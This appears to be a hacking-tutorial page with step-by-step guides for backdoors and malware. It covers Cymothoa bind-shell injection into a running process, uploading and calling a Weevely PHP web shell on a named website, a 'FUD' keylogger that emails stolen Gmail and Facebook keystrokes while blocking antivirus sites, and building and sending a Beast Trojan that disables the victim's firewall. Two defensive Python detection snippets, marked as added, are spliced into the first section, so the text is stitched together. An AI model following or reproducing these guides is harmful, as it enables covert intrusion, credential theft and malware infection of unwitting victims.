Cymothoa – Runtime shellcode injection Backdoors

Cymothoa is a stealth backdooring tool that injects backdoor shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them. Keep in mind that it is a runtime injector, so it only works on applications that are already running.
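Because the injection depends on ptrace, a defender can check how freely the kernel allows ptrace attach and which processes currently have a tracer attached. The following is an added example, not part of the original page or of Cymothoa; the function names and the proc_root parameter are illustrative.

```python
import os

PTRACE_SCOPE = {  # values of the Yama LSM sysctl kernel.yama.ptrace_scope
    0: "classic: a process may attach to any other process with the same uid",
    1: "restricted: a process may attach only to its descendants",
    2: "admin-only: attach requires CAP_SYS_PTRACE",
    3: "no attach: PTRACE_ATTACH is disabled and cannot be re-enabled",
}

def read_ptrace_scope(proc_root="/proc"):
    """Return the Yama ptrace_scope as an int, or None if Yama is absent."""
    path = os.path.join(proc_root, "sys/kernel/yama/ptrace_scope")
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None

def parse_status(text):
    """Parse the 'Key: value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def traced_processes(proc_root="/proc"):
    """List (pid, name, tracer_pid) for every process with a tracer attached."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "status")) as fh:
                st = parse_status(fh.read())
        except OSError:  # process exited between listdir() and open()
            continue
        tracer = int(st.get("TracerPid", "0") or 0)
        if tracer != 0:
            hits.append((int(entry), st.get("Name", "?"), tracer))
    return sorted(hits)

if __name__ == "__main__":
    scope = read_ptrace_scope()
    print("ptrace_scope:", scope, "-", PTRACE_SCOPE.get(scope, "Yama not available"))
    for pid, name, tracer in traced_processes():
        print(f"pid {pid} ({name}) is being traced by pid {tracer}")
```

TracerPid is non-zero only while a tracer is attached, so the scan is a point-in-time signal; the ptrace_scope setting is the durable control, and values 1 and 2 do not restrict a tracer that holds CAP_SYS_PTRACE.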

Open your BackTrack terminal and type cd /pentest/backdoors/cymothoa

Now type ./cymothoa

The main syntax is: ./cymothoa -p <pid> -s <shellcode_number> [options]

Now type ./cymothoa -S for a list of all available shellcodes

To infect a currently running process, first list the live processes: type ps -aux

I launch a dictionary program as the process to attach to, then run ./cymothoa -p 1510 -s 0 -y 4444

-p  process ID (1510)
-s  shellcode number; 0 binds /bin/sh to the provided port (requires -y)
-y  port number; 4444 will open up a shell on port 4444

You can potentially inject any type of backdoor into any program or application on the system. Because it is a runtime injector, it only works on systems you already have access to. Once a machine is compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.

Now scan the PC with nmap: nmap -sV 192.168.1.3 (Victim IP)
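The bind shell started with -y 4444 appears on the host as a new listening TCP socket, which is what the nmap scan sees from outside. This added example (not from the original page; the function names, the baseline set and the sample table are constructed) finds listeners outside an approved baseline by parsing /proc/net/tcp and resolves the process that owns each one.

```python
import os, socket, struct

LISTEN = "0A"  # TCP_LISTEN in the "st" column of /proc/net/tcp

def listening_sockets(tcp_table):
    """Parse /proc/net/tcp text into (ip, port, uid, inode) for LISTEN rows."""
    out = []
    for line in tcp_table.splitlines()[1:]:  # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN:
            continue
        addr_hex, port_hex = f[1].split(":")
        # Assumption: little-endian host, where the IPv4 address is byte-swapped hex.
        ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
        out.append((ip, int(port_hex, 16), int(f[7]), int(f[9])))
    return out

def owner_of_inode(inode, proc_root="/proc"):
    """Return (pid, comm) of the process holding socket:[inode], else None."""
    target = f"socket:[{inode}]"
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    with open(os.path.join(proc_root, pid, "comm")) as fh:
                        return int(pid), fh.read().strip()
        except OSError:  # no permission, or the process exited mid-scan
            continue
    return None

def unexpected_listeners(tcp_table, baseline_ports):
    """Listening sockets whose port is not in the host's approved baseline."""
    return [s for s in listening_sockets(tcp_table) if s[1] not in baseline_ports]

# Constructed sample table: a listener on 22, one on 4444 (0x115C), one established row.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 22222 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:D2F0 01 00000000:00000000 00:00000000 00000000     0        0 33333 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    for ip, port, uid, inode in unexpected_listeners(SAMPLE, baseline_ports={22}):
        print(f"unexpected listener {ip}:{port} uid={uid} owner={owner_of_inode(inode)}")
```

Since the shellcode runs inside an existing process, the owner reported for the socket may be a program that normally never listens on the network; the mismatch between that program and an open port is the signal to investigate.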

How to Create a Backdoor in Server using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.

Open your BackTrack terminal and type cd /pentest/backdoors/web/weevely

Now type ./weevely.py generate <password> <location where you want to save the file>. It will look something like this:

./weevely.py generate rajchandel (Password) /root/Desktop

Then upload that file to the victim server and, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password>. It will look something like this:

./weevely.py http://telecallerjobs.com/webdoor.php rajchandel

 

uname -a – print all information

free – display information about free and used memory on the system

pwd – print name of current/working directory

df – displays the amount of disk space available on the filesystem containing each file name argument

w – displays information about the users currently on the machine, and their processes

ls – list information about the FILEs (the current directory by default)

How to Hack Gmail Facebook using FUD Keylogger

First Download Project Neptune Keylogger

Open the program 

Double click on the program where you downloaded it

First check the button that says “Use Email for Storing Logs” Then change the amount of time the Keylogger sends logs.

In the Email Settings tab keep “smtp.gmail.com” and the port number 587. Where it says “Email to Send Keystroke Logs”, put your email in that box, and in the box under that put the password to your email.

If you want, you can change what email it sends the logs to, but otherwise use the same email that you put above.

Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step. 

Keep all the settings the same, unless you want to disable task manager or block websites now will add some online virus scanning sites to block them —this means that the sites can’t scan the tool for virus.

Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.

In the Installation Directory I would put it in the “AppData” folder.

Then go to Original File and check “Do Nothing with Original File after Install” to keep suspicion level none.

If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.

Now go to the ‘Server Creation’ tab and press ‘Generate New Server’ under ‘Server Creation’, and give a name to your Keylogger, and that's it. You are done.

You have successfully created a Keylogger server file. Now, simply send this file to your victim via email; once the victim runs our Keylogger, we will get key logs every 20 min via email.

How to use Beast Trojan

Step 1:- Download the necessary software, Beast 2.06

Step 2:- Open the software

Step 3:- Now click on the “Build server” button.

 

Step 4:- Now in this window click on the notifications tab.

Step 5:- In the notifications tab click on the e-mail button.

Step 6:- Now in this window fill in your proper and valid email ID.

Step 7:- Now go to the “AV-FW kill” tab.

Step 8:- Now in this tab put a tick mark on “disable XP firewall”.

Step 9:- Now click on the “EXE icon” tab.

Step 10:- Select any icon and click on the “Save Server” button and the Trojan will be made.

Step 11:-Now send this Trojan File to victim.

Step 12:- When the victim installs the Trojan on his system, you will get a notification e-mail at the e-mail ID you specified while making the Trojan. This e-mail consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.

Step 14:- After that, click on the “Go Beast” button and you will be connected to the victim's PC.